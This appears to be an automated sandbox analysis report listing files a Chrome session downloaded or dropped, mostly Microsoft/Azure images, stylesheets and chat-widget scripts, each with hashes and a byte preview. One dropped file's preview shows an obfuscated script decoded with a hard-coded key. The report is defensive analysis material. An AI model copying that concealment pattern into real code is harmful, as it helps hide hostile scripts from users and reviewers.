                                                                        Preview:RIFF....WEBPVP8L..../?.=..H.d;l....;......I.....9{v.?v.=g....fv74.{../.s..sv.d.f.t7..s.a.9{.9{.v...>B7.....sn4.[w......_.lWb...a{.....9...Eg.(.<....'.EXIj@..s..9...z....{..H.+I.g.b'..c.+G.....SpvoI.Z.M........S.k...@.h...IR!G.{....c._R.cA.xe.../M...e.!6d...lsN.N.....+...O}p..`..A.L.x.~.W6...M..e....2..]j...ImG...-.$y'.*..'..,.hg.(..........`.._.-v.....Y9...I`;..e.Il.l...*...(/.....*...@.{.lS..cW..I.Nx.k.c..EH...x[.r,.I.c.BR...;G.0/.6...Lm8g........*..m...P.....I..*....P@..6.{..A.a.m..l....l.....~......$...HHUU.].m..z..:.~..[B7.....H..n...%].K..q].=.-....#....W...U.U5.4.$6..$=H..u=W.o\.uU..U._i{....H..!=.u]u.~uUm((.$I.......`...I.......|.oE.,.m[.Pi...t.!.........mk....8..J......".?..m.Q.7>.tJ...*,......at......jk..E..>|.j.....E. .l8.4.......buH..)u.5jk.....OO_U!.....C..G.2...X.(.RH..jUU..RX,.ip.b.^-.@..U..J.E...K.b....[.b...'..=./.BGJ..E...Z-j......#j..b+...o...j4.z..F.K...q....0..0..b.v...;u:o;.....f..S....eY..*..3.S.EYcR...g..2...$.bR..a=.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ISO Media, AVIF Image
                                                                        Category:downloaded
                                                                        Size (bytes):602953
                                                                        Entropy (8bit):7.997698359857647
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:9C46E2D24FF5534D21155F9D9331C1B9
                                                                        SHA1:8110F8D2BE4EDAB12389526D3EE609B189F2996D
                                                                        SHA-256:83C2BBC2311C2A27CA5C40BAB940C6E89B5D37254C9086BDFA3A67D2815B45C0
                                                                        SHA-512:C8AFF49E1E1AD298EDBDE539B9239AE93D8D5E5DBF1C896410BD428731819E66C6A97EC92FA6B809219E81D736695C93EC46B124A13D4C3F9CD72D89B8443699
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/371220-desktop-verticalaccordion-solutions-featured-tab1?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=1600&hei=1272&qlt=100&fmt=png-alpha&fit=constrain"
                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D.............../..................Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe.......@........pixi............av1C........colrnclx...........pixi..........av1C.......8auxC....urn:mpeg:mpegB:cicp:systems:auxiliary:alpha.....ipma........................1.mdat.....*....P2..D|.I...R.L.8...C.d....,.B..5......rS.ko(. .tlPh.]q..qGQP....4.[.~*{e..(.B_..m.o..{......._...........^.zM.~Yh....c.....F.K>eg..*O8.MW\....b..f.j21=.E..N..X.q...gp..........(*..<..'.$zk.......!D.e..:../.0.z......r.x.v.X.NFE...7..@.$.[.3^o.e.....!$.!'m[.)p...f...[....,...&.s......Q.....u....\.J.;...k........A.{H....w.3e..c...Bl.F......2...0z..\.....E."..Y...R.t.@.....".......p+.S..#..$P.....o..s]..9m...B...R.H.R..Ct...."~prR+p.#..7%.QZ.<Z....I...>.....* .....*.......B2..$D....../....,E.C....\.}.Opb....l!...<..b...
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (65317)
                                                                        Category:downloaded
                                                                        Size (bytes):89220
                                                                        Entropy (8bit):4.793594206481332
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:DFB8FC36E102730FDDF78B5494EB0035
                                                                        SHA1:B513D9A39AF2EE145F12C1BA03F9982960C47029
                                                                        SHA-256:8D321D88CB97FDEDC3189506C25DE9292C6E73A60EBAAB496243346C6404480E
                                                                        SHA-512:F6EB006B5D0844ED078689E9C80215A63AF294FBE80F088F52229D5A4E6DDCFCA8958D5C39DE03484D066BEAE2E00B93AE83D1E5A42F5D4F710BAA8E3E7CC57A
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css
                                                                        Preview:/*!. * Font Awesome Free 6.0.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). * Copyright 2022 Fonticons, Inc.. */..fa{font-family:var(--fa-style-family,"Font Awesome 6 Free");font-weight:var(--fa-style,900)}.fa,.fa-brands,.fa-duotone,.fa-light,.fa-regular,.fa-solid,.fa-thin,.fab,.fad,.fal,.far,.fas,.fat{-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;display:var(--fa-display,inline-block);font-style:normal;font-variant:normal;line-height:1;text-rendering:auto}.fa-1x{font-size:1em}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{font-size:5em}.fa-6x{font-size:6em}.fa-7x{font-size:7em}.fa-8x{font-size:8em}.fa-9x{font-size:9em}.fa-10x{font-size:10em}.fa-2xs{font-size:.625em;line-height:.1em;vertical-align:.225em}.fa-xs{font-size:.75em;line-height:.08333em;vertical-align:.125em}.fa-sm{font-size:.875em;line-height:.07143em;vertical-align:.05357em
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (497)
                                                                        Category:downloaded
                                                                        Size (bytes):38563
                                                                        Entropy (8bit):4.984749570609448
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:72C2846D6FEA9943DD679ECE21D70805
                                                                        SHA1:E1909FBC705EBE1151A0E6ED0DBC73055BFA8C7B
                                                                        SHA-256:EF0810BD339DB472F49EC2F392A437EA95DC3137FDE674EEE6A1BCB4E4349EA3
                                                                        SHA-512:15ECB06102DD6C2D1B34523A61D19AB85326446F25B10B1ED9030320B4CD69DBD17121BE492CDB6745AB2572F6F67538125AD5F1A127AAB8EDBA04C5E9B8E1E9
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://static-assets.fs.liveperson.com/microsoft/lp_ada_enhancements-prod.css
                                                                        Preview:/* ADA CSS */.body #lpChat .lp_dialog_container .lp_buttons_area .lp_confirm_button {..color: #FFFFFF !important;..border: 1px solid #fff !important;.}..#lpChat .lp_minimized .lp_notification_number {..margin-top: 2px !important;.}...lp-json-pollock-layout.lp-json-pollock-layout-vertical {..border-radius: 15px;.}..#lpChat .lp_csat_rater_star {..color: #fff !important;.}...lp_mobile #lpChat>.lp_maximized, .lp_tablet #lpChat>.lp_maximized {..opacity: 1 !important;..width: 100vw !important;..max-height:none !important;.}...lp_desktop #lpChat > .lp_minimized {..width: 400px !important;.}...lp_desktop #lpChat > .lp_maximized {..height: 600px !important;..width: 400px !important;..max-height: 95%;.}..[data-lp-point="lp_line_state"] {..left: -90px !important;.}...lp_sender {..display: none !important;.}...lp_chat_line_wrapper {..overflow: visible !important;..margin-bottom: 12px !important;..padding: 0px 10px 4px 24px !important;.}..[data-lp-point="headerText"] {..color: #fff !important;.}...
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:PNG image data, 108 x 24, 8-bit/color RGBA, non-interlaced
                                                                        Category:dropped
                                                                        Size (bytes):1057
                                                                        Entropy (8bit):7.6851406288304105
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:ED9C9EB0DCE17D752BEDEA6B5ACDA6D9
                                                                        SHA1:ECA56C4904354EED5DA0DEBCD6BD66856AB4784D
                                                                        SHA-256:F664B8138C2DA6EC7565500A7CC839DA6372614A31DC04C5A2169A26B8D9767C
                                                                        SHA-512:3BFB696318DDB93540140DBCD4DBB32F129441E46EE752C6B7379624488533BA27CC7EFF3CAE444C1797CA6EECDF333EDAF443AC84CDEB037A890967091CF91C
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:.PNG........IHDR...l.................pHYs...........~.....IDATh..XMN.P..\.E......' ,.-.$'.H....s...1.vQ.......4.........-.<......{..|.?.w[4....A.=h<>.......7..t.u..]A{..&...,..h.`D4.01]......H.&..C.w...@....*..a..3..H.aR.=.g.(.0.6...;Wl...X.X..G.Bf.....D4...K..p... ..hh.-b.R.Z....Z..zYQc}....u^..R.Dzm$..%c".....C.*z.\&U9P..0.3s*..31..@...W..2....yG.....c)k.F....3.I!....2..F.....`%1.....-..U.s(.p..S.($/...}(.5.\"k.+.I.Q...cb....kt..o.`.........%L....;.J.[..b.xx)c,X7.....)..'.n..H=E<.B.].g.}f.o...........znJ.....Q$....7...#.&..g.D..X....F..~=...%IQ.........e.....>.R..............s..[.D|l.n&..a06..d.5.5YGC..3N......<..Pt..\<{b...i.....)!.....8...0.t_.....8..T.......)G.-mzK....../..TDK..k..s"ch.0....i..`...`V..H.Q"...x......!.."..Q..%3O.L.....$....e.s.m..||.......AD."...#.%b,'..r!.}c...X!2kCD6..iX.\@S..3Er....B...D...%.O...(._...-....{b......z........r.N..W2....L.1~-.J.?.l....?..q:..W.5&.....|..>.B...G.oa.S.....1......Zo...q.....
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):206
                                                                        Entropy (8bit):5.069458334688229
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:131D95CF2EC0E511B73B264FA0C84059
                                                                        SHA1:10A0E2E7C996B7C482B64B953F0A443672A55CF7
                                                                        SHA-256:44A041D41D7F1E7C09AFBCF26471F2370C7182C915633049DDD27229DDBE2C33
                                                                        SHA-512:6D90DB6F32278A6507158107EC23F48C700DF46103F1860B9DE0305662A0755CBCF52EC1F35D9289A4BFEBF6C4C88D1E5C2C76E776C12BCB56A8051AA3343EB1
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://azure.microsoft.com/etc.clientlibs/microsoft/components/content/inline-video/v2/cascade-media-player/clientlibs/site.min.ACSHASH131d95cf2ec0e511b73b264fa0c84059.css
                                                                        Preview:/*!..To avoid conflict with MWF styles, added a wrapper class.. */.ump-container{max-width:100%}..ump-sm{width:800px}..ump-md{width:1200px}..ump-lg{width:1600px}..ump-xl{width:1920px}..ump-fill{height:100%}
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1664x936, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                        Category:dropped
                                                                        Size (bytes):110362
                                                                        Entropy (8bit):7.998202787902821
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:7EF1654626474E1B1E2B23E4D434630C
                                                                        SHA1:A438CE1951F48F855DF272A08CAEC023BBBE0EB7
                                                                        SHA-256:CAEB5AB7DC52A502AB88E1A229A39D4814EC231523F8B85168E3C030165F2390
                                                                        SHA-512:F73C7374416E19854023217F6139598E92B30660DDC9CD942185986100FCAB0A8D0A4E203898D7D6167B5D9870CC36F06BB5C0BFA8B4A644F5DCF7EAD968526E
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:RIFF....WEBPVP8 .....b...*....>=..D"!...2:....gnL.v2.^...W8..?..".S.?[s....!.....).+f.....+..r.IX}.._..s.}{.6/....7.....M............^.}....z....w..............?....k...G..+...$..9.....?.=v....<.ck............./.O......m....{.nvu.m..C..4bE..ka......#4,.....;|. .......$.F'..M.p...h..3.[Vl.P.K...>.....}r. 6z?...."fG...AI2.zJ...D*.D..&e..O:1.|.+#V\.Gn.....<....Jln._.*.U...]R.g.hO.4_.vn..D..l-..pPm].q...=.K...^.Co....'.X.%K.K..0.b(A...p-4...Fa&=......994.....(A.Q.zf."@....tkR....f^.......D.u....H......#......."C.P.R>.....f.J.0.f.D.e..?...d9...(Rf....B..I5..ZT...........S.._....*X........@E.........<k.j...P...$...e.....V.d9..b.M...c.2.@p.i.9.xt...w.&....a.....;...F...F..)..$m........\.?}.,9.....r.A..B.9.. ..SH....m{.nvu.m.....9. .w.........y.......6Ya.-1o=W.,G...A.p..p....p.|6k.}..X.....(T3: ....~]..9..Y.....Q.|9..w.Y..K....|.....`.q.z7~..i2..q.t....`..8.L[.!....g..r.."..cJ.}.i.@...}8.;..(.&9..Bp.d.\...]......ck......fI...`...TwfZ4...n.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                        Category:dropped
                                                                        Size (bytes):726620
                                                                        Entropy (8bit):7.992646777013396
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:BECC0A85B305AE2D75C8F70104DEF41C
                                                                        SHA1:14B9ECC6A61370E5EDCDE0F36A57E7F86CF278B0
                                                                        SHA-256:842A2675D9AFBDDAE9F338E8868F7CAC0B9B96E575BEE2085BFA06DE691D98DB
                                                                        SHA-512:4B69370C438276FB06BF5BE07FACAC91E3A6CD680C769208A01402C1057C4237EE0DB6BFA1416955B540D402FACB1918ED6603BADC8DF9EAFBAE3DABC458BA89
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:RIFFT...WEBPVP8LG.../?.....$.m.e>+.u..L.r......AyW..!.$....t......&d...S>...#&.s$....GL2f.....T.w.3......=.5..3z&.l:.z..(B..5{&1.ar....~HE.p..\....=g*Q-.U..9.v....9......4.M.*.#T7..V.b*sV-lT...$;.d...A.KTkw%..f.'kwU...T...f...lWn..2........?.r..T..__.....o....HNl....."I....Z'.........h-~Z [.m...b...Yqy.../....G6qY.u#I.$G...H. )....Jk.^......Y......#wHt..>.q....9....:..v.B.*$.JU..'.."..0...k...}#.HWu.MG.....(...g#.j....0e9.{..%u.K.bO..bG..e..w...x...@....u.&f...R..S~..I.Yd.."wb).+...H..........S.......7..E~....K.......f...........w.O.. .....R..H.h..v.....1..\O._h*.?A.@H@H........`....|..B..6.p..&.P:.!....`..v3...TOTO.|.0..........K Z....?......@-..1.c@...Q..........]..I.XA4]....f.01..rm..>...p}q..>.)D...^x.E!>...fwi.....1..I.....|...De....so\?.=..&.l......~.....^U...y..s......U,.....6.b.v.q..8..N..........N;......bL...\.2....i...y......0....r.X....U....Wr.0s^.2K.4....Ds...........w;i.T=.k[..../;.!../k.G...1....[q...NU
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):39
                                                                        Entropy (8bit):4.2504143220263435
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:D66C468F4CA17E83CCD97A4518B3E814
                                                                        SHA1:2E657440F653DA65E699AC9230D82FAEE414D8A5
                                                                        SHA-256:8E1CE663720F6AFB2DEE29B587D3F7559EA89BC622F966120C9F108172A5C866
                                                                        SHA-512:FC012A375F871892839D547D3FB3D38B58C2542B0F32FB005A7CADCA7ECD676D1626F3CE79E2DD24890B02162EF7C2B8A877049CE7865B9B83C7FFDA9C40FBBF
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://azure.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-reimagine-page/clientlib-aem-styles.min.ACSHASHd66c468f4ca17e83ccd97a4518b3e814.css
                                                                        Preview:.xf-content-height{margin:0 !important}
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (309), with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):309
                                                                        Entropy (8bit):4.971196656935236
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:D7106DB242C2B41F88A1B02418BEC7E2
                                                                        SHA1:7A445118F0B5712744AA4AED6889B28C1E7779F7
                                                                        SHA-256:044527A735B287BD84D2AE6D2D3B89C85B52C9750BB07E5AEF19FB8F28F0442B
                                                                        SHA-512:C493FBD6926006108E56E23BB204BFE59A7364ED6D2409B5B258D9EA6C060259E13A7E7A22021607F6EDD55EEA52C75DFE7FCF18BB76D6E539FBD763BF399185
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:'use strict';var DynamicClientSideScriptHandler=function(){return{fetchScriptLink:function(b){var a=(a=document.querySelector('div[data-identifier\x3d"'+b+'"]'))?a.getAttribute("data-content"):null;null===a&&(a=(b=document.querySelector('meta[name\x3d"'+b+'"]'))?b.getAttribute("content"):null);return a}}}();
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (39335), with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):39335
                                                                        Entropy (8bit):5.245657338212633
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:058746DEA85C93AE0326F56455CA854F
                                                                        SHA1:88C6DFB90BACDEED2592E5E18BFAC899BCE0C901
                                                                        SHA-256:DD101610BFDD5074E44F8DB73AE061DFBD46C7B6A7C860171E525088E85B6474
                                                                        SHA-512:CA39C20F74FD97222D8FCCCC1D7BE0E52FD250ABCFB4A0851FE0C00F927376119B8B2D5639A30E62609027009561D12791B197AA7B10AE10BD90537DF09CF073
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:!function(){window.liveperson=window.liveperson||{};window.liveperson.uiframework=window.liveperson.uiframework||{};window.liveperson.uiframework.latest=window.liveperson.uiframework.latest||{};(r=window.liveperson.uiframework)["v0.8"]=r["v0.8"]||{};var r=r["v0.8"],o=window.lpTag&&window.lpTag.taglets&&window.lpTag.taglets.lpUtil,g=window.lpTag&&window.lpTag.unifiedWindow&&window.lpTag.unifiedWindow.log;r.LPModel=r.LPModel||function(e,i){(g="object"==typeof i?i:g)&&!0!==i||(g={error:t("ERROR"),warn:t("WARN"),info:t("INFO"),debug:t("DEBUG")});function t(t){return function(e){!0===i&&window.console&&("ERROR"===t&&window.console.error?window.console.error("LPModel#"+t+" : "+e+", "+n()):window.console.log&&window.console.log("---LPModel#"+t+" : "+e+", "+n()))}}function n(){function e(e){return e<10?"0"+e:e}var t=new Date;return e(t.getHours())+":"+e(t.getMinutes())+":"+e(t.getSeconds())+", "+t.toDateString()+", ("+t.getTime()+")"}var l=!(!e||"boolean"!=typeof e.debugging)&&e.debugging,c=ne
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ISO Media, AVIF Image
                                                                        Category:downloaded
                                                                        Size (bytes):184422
                                                                        Entropy (8bit):7.9987438144841
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:7D6296E2DE63720C4D5E964CBD7D3FF6
                                                                        SHA1:3864CF8DAEFCD0DF29DFF61817DEC9AA9AC761E1
                                                                        SHA-256:30CCF6C66BAF7C50F424C9A3BEF3DAE2AC1B15FC40FD74A47531270246E76BF2
                                                                        SHA-512:542A4BEE68CAD2D84145A43D8768F1DFD40D49AB401264E935D2C373F568F3859EF9B3CF73433CAE25A48DB357BA1E42442386EAFDD53DACA39E77114AE99DA4
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/371220-mobile-vertical-accordion-solutions-data-transformation-tab-1-328x270?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=656&hei=540&qlt=100&fmt=png-alpha&fit=constrain"
                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D................L...(iinf..........infe........av01Color....jiprp...Kipco....ispe................pixi............av1C........colrnclx...........ipma..................Tmdat.....&h.o.....2...D....'"....Ks....8..m.,.%.i.....t.8.o.....p.b.._j..Bm..H..u...K.V.P...O1..Ad1jvX....Y.^..HJ..];1..Z...L.b..w...D...._..2vL.P.h..4...P.x..>.1.o.l..V....!....S..W.5.|+.}1....i.8n9.O.........P...gd..=uB...p.._...%...y..R.i+.b?...._..s.`....)...... .....C..|.TR.....j..6....3...r}.,..]..*.;o.._........W.[.......H...k..2...WI..D.:F.u.~..g+.bT.r*/..'.......:.(..)...L...6.....l.......(.*3.lf.}.f%..A...(n)..9.-[u%.i.......@'.Aq.V.j[.f.N..#L.w.!.qD....'.U.F.h.2.v..g.PD..g...#>..>.Y{Y.V...q..C}B.c.Gf......u...%.:.V..TG.zm..Z...(P.a.zF.v....".6._.....UWB4k..7$h....\.o..........=Y.b...h.-0.....nnJ\7E.,.Z....K..B..b..~_..$.+..i).~..T].>J._g:.....W.".WQ.0../5.........D.m..
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (12627)
                                                                        Category:dropped
                                                                        Size (bytes):12802
                                                                        Entropy (8bit):5.124082495154799
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:FA00B18FCDB281E9F58EDCD085E4F2BF
                                                                        SHA1:22DCE8FAA541BC0C96A488C0B31866D6A99E6EBC
                                                                        SHA-256:867B4F2FF19FA0020AA24835BC5320FBFC787E689D56E16FEAA6F788D6719F97
                                                                        SHA-512:AB2DDD75D8CA6CB2267BEBBC83FD78D6558F969353D481128096E27260DD10A9B9A136168C680075271B27BB052DDFB895BC0CF09E7D4CF13E4C20572914521F
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:var key = "secretkey";.var encodedScript = "FwoABwgRBRFXEgEHNxMRBRE1GhYXFwsRGU1eNyouMQoaHwAXBykMEwERD0JVU01KUlhKSx5zU0VDUgkRH0UYBhEMFRcVCQccFyAOEwwYS1hZVEJYeEVUS0UaHAsQBkUdGCgWEQwPF0VJS0oQIw0MHAAIAjUYFxkKIgoQFyQXFxcMGwFbAksNFhYXWgsVHQweEhEMAEsBGAALMgIGHBFdUG9zU0VDUkpbSyIcB0UGHwQdB0UfAQoOUjAmJ0UREhYLUhIdHw1ZABERGwYASxMYHwwHExEdBAtzU0VDUgMBBQYNGgoNUgIRHyAUEgwPNBcbBjArP01KUh5+S0VZU0VDUkUXBAsKB0ULExYcS1hZBAwNFgoDRQkWEAQXGwoaRQ0YAA1NARAWGBELGgsEWlRdUG9ZU0VDUkVUSwwfU01CGgQHA0xZCG9DUkVUS0VZU0VDUkUDAgsdHBJNHgoXChEQHAtNGhcRDUVEU0ICEAoBH18bHwQNGUJPYUVZU0VDUkVUS0VZUxcGBhAGBUVeVF5pUkVUS0VZU0UeeEVUS0VZU0VDBhcNSx5zU0VDUkVUS0VZU0VDEQoaGBFZFwAAHQERDyAUEgwPUlhUChEWEU0LExYcQl5zU0VDUkVUS0VZU0VDXUpUIgNZFwAAHQERSwMYGgkQUgoGSwsWUxURHRURGUUcHgQKHklUGQAdGhcGERF+S0VZU0VDUkVUS0VZGgNDWkQQDgYWFwAHNwgVAglZDxlDUwERCAodFgEmHwQdB0sQHQYPBwERGE1eM0JKW0UPYUVZU0VDUkVUS0VZU0VDUkUDAgsdHBJNHgoXChEQHAtNGhcRDUVEU0ICEAoBH18bHwQNGUJPYUVZU0VDUkVUS0VZU0VDUkUGDhEMAQtDVUJPYUVZU0VDUkVUS0VZUxhpUkVUS0VZU0VDUkVUGQANBhcNUgERCAodFgEmHwQd
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:PNG image data, 200 x 200, 8-bit/color RGB, non-interlaced
                                                                        Category:downloaded
                                                                        Size (bytes):13161
                                                                        Entropy (8bit):7.965902547865542
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:0A26EC9F03843AB24ACC0126940DC770
                                                                        SHA1:6DFB86B51A7DBF2EAB443FA6BBD3EB25FED169E6
                                                                        SHA-256:6E73A1FCEE56593BD56E31726B67FC0B48A7AE998DCE10BF35A04D2F12FC1267
                                                                        SHA-512:929AE70114CB6D7A003549C04491F1DE913EEF3EFF8E08918C45C343F52C0014EBBFA047F685213825F551BA7B568A791CF1CAEDEC71F791F9F4880777BFD6EE
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://logo.clearbit.com/biolegend.com?size=400
                                                                        Preview:.PNG........IHDR.............":9...30IDATx..}..]E..;.[.o6...B*..!.b.L ....`..@Q....b.A..AD. .G..&.A..THB6e7..m.).g..{w7....|.{.sss.s....,.R...G.........X..... ..b.D.C,.H`.e.....".!.A$0.2...X..... ..b.D.C,.H`.e.....".!.A$0.2...X..... ..b.D.C,.H`.e.....".!.A$0.2...X..... ..b.D.C,.H`.e.....".!.A$0.2...X..... ..b.D.C,.H`.e.....".!.A$0.2...X..... ..b.D.C,.H`.e.....".!.A$0.2...X..... ..b.D.C,.H`.e.....".!.A$0.2...X..... ..b.D.C,.H`.e....."...........Fb.D.H.%..7..C0.. .|..+..+#....H,.H.!$..U...Fb.D...X... ..Z...>...B|t.1.W.I..,^Br)%.$,6....,kG..?7..4>....;.##V9...+...[.yM..U..u,.%.....$.WR.#.........\.C..:Ri[E...1.O#..~,.I,BP. ...2....B.cC..+>2b..&....%...P...9W.~..2.....:.3..M..A....m}...;:.f.u...{.WW..X.....H........2.i.k.].]_...D.@M.o..0.,...@..R_......}}}}.6.<o..G^v..9.@...b..._.....R.........v4....._..A..w..:..U.)n..w..AY.aye=&.d2*..?..n...b..a.==,..Gw.Nu.]^.."L0..m......\..m..Z(..!.1..~..7.|..PR..WUii.........g~8..0.w..3..^...{..U....z-.Q...7.......K..
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1664x936, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                        Category:downloaded
                                                                        Size (bytes):167686
                                                                        Entropy (8bit):7.9986536100576915
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:08A98F8DA4CAF20CDEAF0A2F255C0F76
                                                                        SHA1:A2145CA704705A0FE45A187EEFDCA0A7B57952AD
                                                                        SHA-256:3D3A7C9DE9D5C40425E00A2D3D443BBBD60412800D44D7481D70D5BCC0EA1D8A
                                                                        SHA-512:DAA29C9725A19225C305A5D1304D0AF734EFE78510B467652DEF60A0AAEFA6A07564E91FBA253F7D37E733B2F3795A86226D32536343DFFACA7B39A9BD298BD9
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/resources-tab-1-2x?scl=1
                                                                        Preview:RIFF....WEBPVP8 ...P|...*....>!..B..".h.. ....~.k...p.n.w..d.....j...5.............O+.....~..'...G....r.G{....?..,}.:/...............o.....~3.>.A......w.................................g./............o...........D.............?..............?...?.g.O.............7.?.....?....................K.........;._.................w..t.s.....5.?.......?w.........G..e.-._./....o.........C.w..w^....._?.....A..........a...s.w."O.z............^..G...............~...'/....wNb.......N....-../....M....:iI..7.$../..M2../. A...D>....+.t..I6....I.'. ..".B.I..K...o...R.nuv...v..|<.uA..:$...m.M.UAr%Z.I.........u..vr.>.T ...t.o.?L..........m7|..YC..qJ.,@.~....r.#...].....].Re...V................O..&.K`w,.B./`.0Aq.....c..-..t...m..P.PQ.s..G.....S~..X ..:.WY=\.B.M.]..Z.f.A,".).$.'{....<..&g.7.,9....i.A.5#T..G/CV....h.p...6eDJ.88&...NQ]n...p..c....$.Y=V.NW.e.f...])C..........!..$yJ.tj4N.....h..d...].d.....IH.[\.J.YO.M...qN....C....{h.|p...!~..X.V.pA?xV...t..
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:SVG Scalable Vector Graphics image
                                                                        Category:downloaded
                                                                        Size (bytes):2270
                                                                        Entropy (8bit):5.143457190074302
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:71466B34E5515A90219D78F8E13B609B
                                                                        SHA1:AD1A515D373D08A66A5121FE248BE5648C07E534
                                                                        SHA-256:52EFB7BE976E0A4B617C597927120CBB6C58E8E7ED4C866A947D879D17433D69
                                                                        SHA-512:BA1649AC59F5AE5794977DF777DEA1830D10D45A1159D5F351D832EBEA630D6B5DF37BCA02A455168CD022C80028E6DCBE17A5BA69CC6B9491540329418E0E2D
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cdn-dynmedia-1.microsoft.com/is/content/microsoftcorp/acom_social_icon_azure
                                                                        Preview:<svg aria-hidden="true" role="presentation" data-slug-id="azure" viewBox="0 0 256 256" xmlns="http://www.w3.org/2000/svg">.. <defs>.. <linearGradient id="azure_ab40b385-f958-420f-bfab-714be1677426-d9e3e844" x1="-960.606" y1="283.397" x2="-1032.511" y2="70.972" gradientTransform="matrix(1 0 0 -1 1075 318)" gradientUnits="userSpaceOnUse">.. <stop offset="0" stop-color="#114a8b"></stop>.. <stop offset="1" stop-color="#0669bc"></stop>.. </linearGradient>.. <linearGradient id="azure_f40af90d-72eb-49b3-94b2-2510f1071722-f8d86361" x1="-938.144" y1="184.402" x2="-954.778" y2="178.778" gradientTransform="matrix(1 0 0 -1 1075 318)" gradientUnits="userSpaceOnUse">.. <stop offset="0" stop-opacity=".3"></stop>.. <stop offset=".071" stop-opacity=".2"></stop>.. <stop offset=".321" stop-opacity=".1"></stop>.. <stop offset=".623" stop-opacity=".05"></stop>.. <stop offset="1" stop-opacity="0"></stop>.. </linearGradient>.. <linearGradient id="azure_e382d
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ISO Media, AVIF Image
                                                                        Category:downloaded
                                                                        Size (bytes):431123
                                                                        Entropy (8bit):7.998998994551496
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:1BB082999BE6B451D19A2717F2FB5B82
                                                                        SHA1:2FCAA707B756AD62856F7934BA041AAF1EC4A37A
                                                                        SHA-256:1D51D4019523058E1AF970AD8F4DD327CE056C949C9F18D0985BADF40E17D8D9
